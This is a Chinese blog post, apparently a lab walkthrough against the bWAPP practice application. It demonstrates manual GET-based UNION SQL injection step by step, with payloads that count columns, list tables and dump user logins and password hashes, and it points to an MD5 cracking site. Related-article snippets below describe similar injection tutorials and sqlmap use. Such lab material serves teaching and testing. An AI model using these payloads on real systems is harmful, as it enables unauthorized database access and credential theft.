SQL注入之GET型(select)

最新推荐文章于 2024-07-20 17:22:43 发布
最新推荐文章于 2024-07-20 17:22:43 发布
阅读量870 收藏
点赞数
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48335646/article/details/125022087
版权

0x01:测试分析

我们进行测试这里是否存在SQL注入漏洞

输入'

点击go后

报错了,说明很大可能存在SQL注入漏洞了。

0x02:爆字段(字段就是这个数据表中的列)

-1 order by 1#

 -1 order by 2#

 

........ 

 -1 order by 7#

 

-1 order by 8#

 

所以可以判断出来,一共有7个列。

0x03:爆数据库名

 -1 union select 1,database(),user(),4,5,6,7 #

当前数据库名为bwapp 

0x04:爆表(即获取当前数据库有哪些表)

-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() #

经判断,当前查询方式有限制 limit 0,1

可以通过group_concat() 查询 

当前数据库有,五张表,分别是

blog,heroes,movies,users,visitors

0x05:获取后台账户用户名和密码

-- 查users表的列名 

 -1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='users'#

 users表中有9列,分别是

id,login,password,email,secret,activation_code,activated,reset_code,admin

 -- 查login和password的内容

-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from users#

 

获得两个账户 A.I.M.和 bee 

密码需要先解密

md5解密地址:cmd5.com

blue Hat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试小菜鸡开课了-手工SQL注入之GET
qq_53238442的博客
10-19 1976
GETSQL注入的最大特点:它的参数内容会显示在请求行,如下图???? pikachu靶场: DVWA靶场: 手工注入MysqlGET有回显的一般步骤: 判断是否存在注入及注入类: 猜测字段数: 查看输出点: 查看数据库名称及版本: 查看数据库中存在的表: 查看表中有哪些字段: 查看对应字段内容: 总结: 手工注入MysqlGET有回显的一般步骤: 判断是否存在注入及注入类: 判断是否存在注入 1、通过在参数后面加一个单引号‘,如果页面出错,则存在SQL注入
SQL注入--GET注入
liukenn的博客
07-29 5664
一个带get参数并且存在从数据库中返回数据的网站: http://127.0.0.1/index.php?id=1   可以进行如下尝试检测是否存在注入点: http://127.0.0.1/index.php?id=1 and 1=1 http://127.0.0.1/index.php?id=1 and 1=2 http://127.0.0.1/index.p
JAVA-Mybatis-plus的使用
weixin_46690278的博客
03-18 2079
我上一篇文章写了集成,这里说下使用。 先看下官方提供了很多方法: 这里通过的CRUD满足不了时,条件构造器就派上用场了。主要提供了实体包装器,用于处理 sql 拼接,排序,实体参数查询等! 这里需要注意:使用的是数据库字段,不是Java属性!,原来使用另一款通用mapper时记得使用的是JAVA属性。 Sql拼接条件: @RunWith(SpringRunner.class) //SpringBootTest 是springboot 用于测试的注解,可指定启动类或者测试环境等,这里直接默
在用dw.GetSqlSelect()获得到的Sql语句出现PBSELECT( VERSION的解决办法
weixin_30493401的博客
06-03 561
在用dw.GetSqlSelect()获得到的Sql语句出现PBSELECT( VERSION的解决办法: 把数据窗口的数据源转换到syntax模式下就行了! 转载于:https://www.cnblogs.com/Tonyyang/archive/2008/06/03/1212689.html...
datawindowchild的GetSQLSelect()方法获取 sql
tlammon的专栏
03-20 1903
1 datawindowchild的GetSQLSelect()方法获取 sql 2 Integer rtncode String ls_nowFld,ls_deptid,ls_sql DataWindowChild fld_child rtncode = dw_1.GetChild("Unit_id",fld_child) //获得Unit_id字段名下拉数据
SQL注入--get注入
weixin_52151447的博客
11-11 2399
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
SQL注入之GET
qq_51393133的博客
09-11 929
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
泛微OA8前台sql注入1
08-08
【泛微OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对泛微OA8系统的一个前台SQL注入...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
简单的sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
ASP.NET防止SQL注入的方法示例
01-20
`strs`数组中列出了可能导致SQL注入的关键字,如"select", "drop", "exists", "exec", "insert", "delete", "update", "and", "or", "user"等。这些关键字在正常的用户输入中不太可能出现,因此它们的出现可能表明...
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 851
owasp十大漏洞中第一的sql注入
get基于报错的sql注入
冷巷(✘_✘)的博客
07-14 1077
目录1.SQL注入的分类数字字符2.get基于报错的sql注入发现3.get基于报错的sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类可将sql注入分为数字和字符。例如 字符 例如 2.get基于报错的sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 615
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
GETsql注入教学
m0_67265441的博客
01-29 769
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列名把数据都列出来。第六步:通过表名查询列名。第一步:判断页面真假值。
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1223
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
浅谈getsql注入的手工注入方法
IT小学生的专栏
11-14 8948
很多人问我怎么手工进行sql注入,在此,我谈一下自己的一点感受,纯属技术交流,严禁非法使用。 在进行sql注入之前,先要搞清楚sql注入的原理。要不然,你会看不懂我接下来要说的东东 SQL 注入(SQL Injection):就是通过将恶意的SQL指令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL指令。 原理:通过构建特殊的输入作为参数传入Web应用
多租户架构的艺术:在SQL Server中实现数据库的多租户
最新发布
2401_85762266的博客
07-20 317
多租户架构允许多个租户共享相同的应用程序和数据库架构,每个租户的数据被逻辑上隔离。这种架构的优势在于成本效益和可扩展性,但同时也带来了数据隔离、性能和安全性的挑战。
SQL注入与内网渗透技术详解
此外,还提到了不同类SQL注入,如数字和字符、GET和POST等。内联注释的功能和在SQL注入中的应用也被提及,以及联合查询、ORDER BY语句和SQL注入中常用的一些函数。文件还涉及了数据库的文件读写权限,如 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值